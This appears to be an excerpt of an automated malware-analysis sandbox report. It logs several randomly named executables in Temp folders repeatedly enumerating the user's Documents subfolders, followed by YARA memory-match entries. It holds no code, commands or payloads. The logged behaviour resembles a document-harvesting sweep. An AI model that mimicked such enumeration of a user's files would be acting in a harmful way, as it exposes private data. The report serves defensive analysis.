Source: C:\Users\user\AppData\Local\Temp\1021707001\8469cb4d4d.exe    Directory queried: C:\Users\user\Documents\NWCXBPIUYI
Source: C:\Users\user\AppData\Local\Temp\1021707001\8469cb4d4d.exe    Directory queried: C:\Users\user\Documents\PIVFAGEAAV
Source: C:\Users\user\AppData\Local\Temp\1021707001\8469cb4d4d.exe    Directory queried: C:\Users\user\Documents\PIVFAGEAAV
Source: C:\Users\user\AppData\Local\Temp\1021707001\8469cb4d4d.exe    Directory queried: C:\Users\user\Documents\QCFWYSKMHA
Source: C:\Users\user\AppData\Local\Temp\1021707001\8469cb4d4d.exe    Directory queried: C:\Users\user\Documents\QCFWYSKMHA
Source: C:\Users\user\AppData\Local\Temp\1021707001\8469cb4d4d.exe    Directory queried: C:\Users\user\Documents\ZQIXMVQGAH
Source: C:\Users\user\AppData\Local\Temp\1021707001\8469cb4d4d.exe    Directory queried: C:\Users\user\Documents\ZQIXMVQGAH
Source: C:\Users\user\AppData\Local\Temp\1021707001\8469cb4d4d.exe    Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1021707001\8469cb4d4d.exe    Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1021707001\8469cb4d4d.exe    Directory queried: C:\Users\user\Documents\LFOPODGVOH
Source: C:\Users\user\AppData\Local\Temp\1021707001\8469cb4d4d.exe    Directory queried: C:\Users\user\Documents\LFOPODGVOH
Source: C:\Users\user\AppData\Local\Temp\1021707001\8469cb4d4d.exe    Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1021707001\8469cb4d4d.exe    Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1021707001\8469cb4d4d.exe    Directory queried: C:\Users\user\Documents\BJZFPPWAPT
Source: C:\Users\user\AppData\Local\Temp\1021707001\8469cb4d4d.exe    Directory queried: C:\Users\user\Documents\BJZFPPWAPT
Source: C:\Users\user\AppData\Local\Temp\1021707001\8469cb4d4d.exe    Directory queried: C:\Users\user\Documents\BNAGMGSPLO
Source: C:\Users\user\AppData\Local\Temp\1021707001\8469cb4d4d.exe    Directory queried: C:\Users\user\Documents\BNAGMGSPLO
Source: C:\Users\user\AppData\Local\Temp\1021707001\8469cb4d4d.exe    Directory queried: C:\Users\user\Documents\NWCXBPIUYI
Source: C:\Users\user\AppData\Local\Temp\1021707001\8469cb4d4d.exe    Directory queried: C:\Users\user\Documents\NWCXBPIUYI
Source: C:\Users\user\AppData\Local\Temp\1021707001\8469cb4d4d.exe    Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1021707001\8469cb4d4d.exe    Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1021707001\8469cb4d4d.exe    Directory queried: C:\Users\user\Documents\NWCXBPIUYI
Source: C:\Users\user\AppData\Local\Temp\1021707001\8469cb4d4d.exe    Directory queried: C:\Users\user\Documents\NWCXBPIUYI
Source: C:\Users\user\AppData\Local\Temp\1021707001\8469cb4d4d.exe    Directory queried: C:\Users\user\Documents\PIVFAGEAAV
Source: C:\Users\user\AppData\Local\Temp\1021707001\8469cb4d4d.exe    Directory queried: C:\Users\user\Documents\PIVFAGEAAV
Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exe    Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exe    Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exe    Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exe    Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exe    Directory queried: C:\Users\user\Documents\BJZFPPWAPT
Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exe    Directory queried: C:\Users\user\Documents\BJZFPPWAPT
Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exe    Directory queried: C:\Users\user\Documents\BNAGMGSPLO
Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exe    Directory queried: C:\Users\user\Documents\BNAGMGSPLO
Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exe    Directory queried: C:\Users\user\Documents\GAOBCVIQIJ
Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exe    Directory queried: C:\Users\user\Documents\GAOBCVIQIJ
Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exe    Directory queried: C:\Users\user\Documents\GIGIYTFFYT
Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exe    Directory queried: C:\Users\user\Documents\GIGIYTFFYT
Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exe    Directory queried: C:\Users\user\Documents\JDDHMPCDUJ
Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exe    Directory queried: C:\Users\user\Documents\JDDHMPCDUJ
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeDirectory queried: C:\Users\user\Documents\LFOPODGVOH
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeDirectory queried: C:\Users\user\Documents\LFOPODGVOH
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeDirectory queried: C:\Users\user\Documents\NWCXBPIUYI
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeDirectory queried: C:\Users\user\Documents\NWCXBPIUYI
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeDirectory queried: C:\Users\user\Documents\PIVFAGEAAV
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeDirectory queried: C:\Users\user\Documents\PIVFAGEAAV
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeDirectory queried: C:\Users\user\Documents\QCFWYSKMHA
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeDirectory queried: C:\Users\user\Documents\QCFWYSKMHA
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeDirectory queried: C:\Users\user\Documents\QNCYCDFIJJ
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeDirectory queried: C:\Users\user\Documents\QNCYCDFIJJ
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeDirectory queried: C:\Users\user\Documents\ZQIXMVQGAH
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeDirectory queried: C:\Users\user\Documents\ZQIXMVQGAH
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeDirectory queried: C:\Users\user\Documents
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeDirectory queried: C:\Users\user\Documents
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeDirectory queried: C:\Users\user\Documents\BJZFPPWAPT
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeDirectory queried: C:\Users\user\Documents\BJZFPPWAPT
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeDirectory queried: C:\Users\user\Documents\BNAGMGSPLO
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeDirectory queried: C:\Users\user\Documents\BNAGMGSPLO
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeDirectory queried: C:\Users\user\Documents\DUUDTUBZFW
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeDirectory queried: C:\Users\user\Documents\DUUDTUBZFW
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeDirectory queried: C:\Users\user\Documents\GAOBCVIQIJ
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeDirectory queried: C:\Users\user\Documents\GAOBCVIQIJ
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeDirectory queried: C:\Users\user\Documents\GIGIYTFFYT
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeDirectory queried: C:\Users\user\Documents\GIGIYTFFYT
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeDirectory queried: C:\Users\user\Documents\JDDHMPCDUJ
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeDirectory queried: C:\Users\user\Documents\JDDHMPCDUJ
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeDirectory queried: C:\Users\user\Documents\NWCXBPIUYI
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeDirectory queried: C:\Users\user\Documents\NWCXBPIUYI
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeDirectory queried: C:\Users\user\Documents\PIVFAGEAAV
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeDirectory queried: C:\Users\user\Documents\PIVFAGEAAV
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeDirectory queried: C:\Users\user\Documents\QCFWYSKMHA
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeDirectory queried: C:\Users\user\Documents\QCFWYSKMHA
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeDirectory queried: C:\Users\user\Documents\QNCYCDFIJJ
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeDirectory queried: C:\Users\user\Documents\QNCYCDFIJJ
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeDirectory queried: C:\Users\user\Documents
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeDirectory queried: C:\Users\user\Documents
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeDirectory queried: C:\Users\user\Documents\BJZFPPWAPT
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeDirectory queried: C:\Users\user\Documents\BJZFPPWAPT
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeDirectory queried: C:\Users\user\Documents\BNAGMGSPLO
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeDirectory queried: C:\Users\user\Documents\BNAGMGSPLO
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeDirectory queried: C:\Users\user\Documents\DUUDTUBZFW
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeDirectory queried: C:\Users\user\Documents\DUUDTUBZFW
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeDirectory queried: C:\Users\user\Documents\GAOBCVIQIJ
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeDirectory queried: C:\Users\user\Documents\GAOBCVIQIJ
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeDirectory queried: C:\Users\user\Documents\JDDHMPCDUJ
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeDirectory queried: C:\Users\user\Documents\JDDHMPCDUJ
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeDirectory queried: C:\Users\user\Documents\LFOPODGVOH
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeDirectory queried: C:\Users\user\Documents\LFOPODGVOH
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeDirectory queried: C:\Users\user\Documents\PIVFAGEAAV
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeDirectory queried: C:\Users\user\Documents\PIVFAGEAAV
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeDirectory queried: C:\Users\user\Documents\QCFWYSKMHA
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeDirectory queried: C:\Users\user\Documents\QCFWYSKMHA
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeDirectory queried: C:\Users\user\Documents
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeDirectory queried: C:\Users\user\Documents
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeDirectory queried: C:\Users\user\Documents\BJZFPPWAPT
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeDirectory queried: C:\Users\user\Documents\BJZFPPWAPT
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeDirectory queried: C:\Users\user\Documents\BNAGMGSPLO
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeDirectory queried: C:\Users\user\Documents\BNAGMGSPLO
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeDirectory queried: C:\Users\user\Documents\DUUDTUBZFW
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeDirectory queried: C:\Users\user\Documents\DUUDTUBZFW
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeDirectory queried: C:\Users\user\Documents\GAOBCVIQIJ
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeDirectory queried: C:\Users\user\Documents\GAOBCVIQIJ
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeDirectory queried: C:\Users\user\Documents\GIGIYTFFYT
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeDirectory queried: C:\Users\user\Documents\GIGIYTFFYT
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeDirectory queried: C:\Users\user\Documents\JDDHMPCDUJ
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeDirectory queried: C:\Users\user\Documents\JDDHMPCDUJ
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeDirectory queried: C:\Users\user\Documents\LFOPODGVOH
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeDirectory queried: C:\Users\user\Documents\LFOPODGVOH
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeDirectory queried: C:\Users\user\Documents\NWCXBPIUYI
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeDirectory queried: C:\Users\user\Documents\NWCXBPIUYI
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeDirectory queried: C:\Users\user\Documents\PIVFAGEAAV
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeDirectory queried: C:\Users\user\Documents\PIVFAGEAAV
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeDirectory queried: C:\Users\user\Documents\QCFWYSKMHA
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeDirectory queried: C:\Users\user\Documents\QCFWYSKMHA
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeDirectory queried: C:\Users\user\Documents\QNCYCDFIJJ
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeDirectory queried: C:\Users\user\Documents\QNCYCDFIJJ
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeDirectory queried: C:\Users\user\Documents\ZQIXMVQGAH
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeDirectory queried: C:\Users\user\Documents\ZQIXMVQGAH
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeDirectory queried: C:\Users\user\Documents
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeDirectory queried: C:\Users\user\Documents
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeDirectory queried: C:\Users\user\Documents\BJZFPPWAPT
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeDirectory queried: C:\Users\user\Documents\BJZFPPWAPT
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeDirectory queried: C:\Users\user\Documents\BNAGMGSPLO
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeDirectory queried: C:\Users\user\Documents\BNAGMGSPLO
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeDirectory queried: C:\Users\user\Documents\DUUDTUBZFW
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeDirectory queried: C:\Users\user\Documents\DUUDTUBZFW
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeDirectory queried: C:\Users\user\Documents\GAOBCVIQIJ
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeDirectory queried: C:\Users\user\Documents\GAOBCVIQIJ
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeDirectory queried: C:\Users\user\Documents\GIGIYTFFYT
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeDirectory queried: C:\Users\user\Documents\GIGIYTFFYT
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeDirectory queried: C:\Users\user\Documents\JDDHMPCDUJ
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeDirectory queried: C:\Users\user\Documents\JDDHMPCDUJ
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeDirectory queried: C:\Users\user\Documents\LFOPODGVOH
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeDirectory queried: C:\Users\user\Documents\LFOPODGVOH
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeDirectory queried: C:\Users\user\Documents\NWCXBPIUYI
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeDirectory queried: C:\Users\user\Documents\NWCXBPIUYI
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeDirectory queried: C:\Users\user\Documents\QCFWYSKMHA
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeDirectory queried: C:\Users\user\Documents\QCFWYSKMHA
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeDirectory queried: C:\Users\user\Documents\QNCYCDFIJJ
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeDirectory queried: C:\Users\user\Documents\QNCYCDFIJJ
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeDirectory queried: C:\Users\user\Documents\ZQIXMVQGAH
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeDirectory queried: C:\Users\user\Documents\ZQIXMVQGAH
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeDirectory queried: C:\Users\user\Documents
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeDirectory queried: C:\Users\user\Documents
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeDirectory queried: C:\Users\user\Documents
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeDirectory queried: C:\Users\user\Documents
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeDirectory queried: C:\Users\user\Documents\BJZFPPWAPT
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeDirectory queried: C:\Users\user\Documents\BJZFPPWAPT
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeDirectory queried: C:\Users\user\Documents\BNAGMGSPLO
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeDirectory queried: C:\Users\user\Documents\BNAGMGSPLO
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeDirectory queried: C:\Users\user\Documents\DUUDTUBZFW
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeDirectory queried: C:\Users\user\Documents\DUUDTUBZFW
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeDirectory queried: C:\Users\user\Documents\GAOBCVIQIJ
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeDirectory queried: C:\Users\user\Documents\GAOBCVIQIJ
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeDirectory queried: C:\Users\user\Documents\GIGIYTFFYT
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeDirectory queried: C:\Users\user\Documents\GIGIYTFFYT
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeDirectory queried: C:\Users\user\Documents\JDDHMPCDUJ
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeDirectory queried: C:\Users\user\Documents\JDDHMPCDUJ
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeDirectory queried: C:\Users\user\Documents\NWCXBPIUYI
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeDirectory queried: C:\Users\user\Documents\NWCXBPIUYI
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeDirectory queried: C:\Users\user\Documents\QNCYCDFIJJ
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeDirectory queried: C:\Users\user\Documents\QNCYCDFIJJ
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeDirectory queried: C:\Users\user\Documents
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeDirectory queried: C:\Users\user\Documents
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeDirectory queried: C:\Users\user\Documents\BJZFPPWAPT
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeDirectory queried: C:\Users\user\Documents\BJZFPPWAPT
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeDirectory queried: C:\Users\user\Documents\BNAGMGSPLO
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeDirectory queried: C:\Users\user\Documents\BNAGMGSPLO
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeDirectory queried: C:\Users\user\Documents\DUUDTUBZFW
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeDirectory queried: C:\Users\user\Documents\DUUDTUBZFW
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeDirectory queried: C:\Users\user\Documents\GAOBCVIQIJ
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeDirectory queried: C:\Users\user\Documents\GAOBCVIQIJ
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeDirectory queried: C:\Users\user\Documents\JDDHMPCDUJ
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeDirectory queried: C:\Users\user\Documents\JDDHMPCDUJ
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeDirectory queried: C:\Users\user\Documents\PIVFAGEAAV
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeDirectory queried: C:\Users\user\Documents\PIVFAGEAAV
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeDirectory queried: C:\Users\user\Documents
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeDirectory queried: C:\Users\user\Documents
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeDirectory queried: C:\Users\user\Documents\BJZFPPWAPT
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeDirectory queried: C:\Users\user\Documents\BJZFPPWAPT
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeDirectory queried: C:\Users\user\Documents\DUUDTUBZFW
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeDirectory queried: C:\Users\user\Documents\DUUDTUBZFW
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeDirectory queried: C:\Users\user\Documents\NWCXBPIUYI
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeDirectory queried: C:\Users\user\Documents\NWCXBPIUYI
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeDirectory queried: C:\Users\user\Documents\ZQIXMVQGAH
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeDirectory queried: C:\Users\user\Documents\ZQIXMVQGAH
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeDirectory queried: C:\Users\user\Documents\BJZFPPWAPT
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeDirectory queried: C:\Users\user\Documents\BJZFPPWAPT
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeDirectory queried: C:\Users\user\Documents\BNAGMGSPLO
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeDirectory queried: C:\Users\user\Documents\BNAGMGSPLO
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeDirectory queried: C:\Users\user\Documents\QCFWYSKMHA
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeDirectory queried: C:\Users\user\Documents\QCFWYSKMHA
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeDirectory queried: C:\Users\user\Documents
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeDirectory queried: C:\Users\user\Documents
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeDirectory queried: C:\Users\user\Documents\BJZFPPWAPT
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeDirectory queried: C:\Users\user\Documents\BJZFPPWAPT
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeDirectory queried: C:\Users\user\Documents\BNAGMGSPLO
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeDirectory queried: C:\Users\user\Documents\BNAGMGSPLO
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeDirectory queried: C:\Users\user\Documents\DUUDTUBZFW
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeDirectory queried: C:\Users\user\Documents\DUUDTUBZFW
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeDirectory queried: C:\Users\user\Documents
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeDirectory queried: C:\Users\user\Documents
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeDirectory queried: C:\Users\user\Documents\JDDHMPCDUJ
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeDirectory queried: C:\Users\user\Documents\JDDHMPCDUJ
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeDirectory queried: C:\Users\user\Documents\LFOPODGVOH
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeDirectory queried: C:\Users\user\Documents\LFOPODGVOH
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exeDirectory queried: C:\Users\user\Documents
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exeDirectory queried: C:\Users\user\Documents
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exeDirectory queried: C:\Users\user\Documents\JDDHMPCDUJ
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exeDirectory queried: C:\Users\user\Documents\JDDHMPCDUJ
                    Source: C:\Users\user\AppData\Local\Temp\1021707001\8469cb4d4d.exeDirectory queried: number of queries: 1001
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeDirectory queried: number of queries: 1001
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeDirectory queried: number of queries: 1001
                    Source: Yara match  File source: 0000001B.00000003.2816284787.0000000000CB6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match  File source: 0000001B.00000002.2825365325.0000000000CB6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match  File source: 0000001B.00000003.2788989135.0000000000CB6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match  File source: 00000010.00000002.2492014049.0000000002584000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match  File source: 0000001D.00000003.2838159994.00000000014C0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match  File source: 0000001B.00000003.2814761965.0000000000CB6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match  File source: 0000000A.00000003.2190479666.00000000011AC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match  File source: 0000001B.00000003.2695177861.0000000000CB6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match  File source: 00000010.00000002.2492014049.00000000027CB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match  File source: Process Memory Space: 7620ab885d.exe PID: 2456, type: MEMORYSTR
                    Source: Yara match  File source: Process Memory Space: 8469cb4d4d.exe PID: 7060, type: MEMORYSTR
                    Source: Yara match  File source: Process Memory Space: DJj.exe PID: 3500, type: MEMORYSTR
                    Source: Yara match  File source: Process Memory Space: b285303eae.exe PID: 7044, type: MEMORYSTR
